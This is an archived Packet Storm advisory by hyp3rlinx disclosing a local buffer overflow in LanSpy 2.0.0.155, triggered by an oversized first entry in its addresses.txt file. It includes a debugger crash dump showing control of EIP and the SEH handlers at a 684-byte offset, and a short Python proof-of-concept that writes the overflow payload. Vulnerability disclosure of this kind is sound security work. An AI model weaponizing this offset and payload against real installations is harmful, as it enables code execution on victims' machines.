Exploit the possiblities

LanSpy 2.0.0.155 Buffer Overflow

LanSpy 2.0.0.155 Buffer Overflow
Posted Oct 6, 2015
Authored by hyp3rlinx | Site hyp3rlinx.altervista.org

LanSpy version 2.0.0.155 suffers from a buffer overflow vulnerability.

tags | exploit, overflow
MD5 | c50f5946a8cdcba7053adfb7978e02fd

LanSpy 2.0.0.155 Buffer Overflow

Change Mirror Download
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-LANSPY-BUFFER-OVERFLOW-10052015.txt



Vendor:
================================
www.lantricks.com



Product:
================================
LanSpy.exe

LanSpy is network security and port scanner, which allows getting different
information about computer:
Domain and NetBios names, MAC address, Server information, Domain and
Domain controller etc....


Vulnerability Type:
===================
Buffer Overflow



CVE Reference:
==============
N/A



Vulnerability Details:
======================

LanSpy.exe uses an 'addresses.txt' plain text file which lives under the
main LanSpy
directory the file is used to load scanned IPs or URLs

e.g.

127.0.0.1

replace addresses.txt file with our malicious one, the buffer overflow
payload must
be the very first entry in the text file. Next, run LanSpy.exe and click
green arrow
or use keyboard press 'F3' to start. Then KABOOM!... program crashez and we
will control
EIP at 684 bytes also overwrite both the NSEH & SEH exception handler
pointers...

Quick stack dump...

(1274.19c4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.

eax=0264fb41 ebx=00418d7c ecx=0264fe84 edx=00000000 esi=00000000
edi=00000000
eip=41414141 esp=0264fe8c ebp=41414141 iopl=0 nv up ei pl zr na pe
nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b
efl=00010246
41414141 ?? ???
0:001> g

(1274.19c4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=52525252 edx=7714b4ad esi=00000000
edi=00000000
eip=52525252 esp=0264f8f0 ebp=0264f910 iopl=0 nv up ei pl zr na pe
nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b
efl=00010246
52525252 ?? ???
0:001> !exchain
0264f904: ntdll!LdrRemoveLoadAsDataTable+d64 (7714b4ad)
0264fe8c: 52525252
Invalid exception stack at 42424242



POC code(s):
=============

import os

#LanSpy.exe buffer overflow POC
#by hyp3rlinx
#hyp3rlinx.altervista.org
#=============================

#LanSpy.exe uses an 'addresses.txt' text file
#which lives under the LanSpy directory
#the addresses.txt file is used to load scanned IPs or URLs

#control EIP at 684 bytes... also overwrite
#both the NSEH & SEH exception handler pointers
#-----------------------------------------------

payload="A"*684+"BBBB"+"RRRR" #<------- KABOOOOOOOOOOOOOOOOOOM!

file=open("C:\\Program Files (x86)\\LanTricks\\LanSpy\\addresses.txt", "w")
file.write(payload)
file.close()




Public Disclosure:
===================
October 5, 2015




Exploitation Technique:
=======================
Local




===========================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.

by hyp3rlinx

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

January 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    2 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    16 Files
  • 4
    Jan 4th
    39 Files
  • 5
    Jan 5th
    26 Files
  • 6
    Jan 6th
    40 Files
  • 7
    Jan 7th
    2 Files
  • 8
    Jan 8th
    16 Files
  • 9
    Jan 9th
    25 Files
  • 10
    Jan 10th
    28 Files
  • 11
    Jan 11th
    44 Files
  • 12
    Jan 12th
    32 Files
  • 13
    Jan 13th
    2 Files
  • 14
    Jan 14th
    4 Files
  • 15
    Jan 15th
    31 Files
  • 16
    Jan 16th
    15 Files
  • 17
    Jan 17th
    16 Files
  • 18
    Jan 18th
    24 Files
  • 19
    Jan 19th
    7 Files
  • 20
    Jan 20th
    0 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close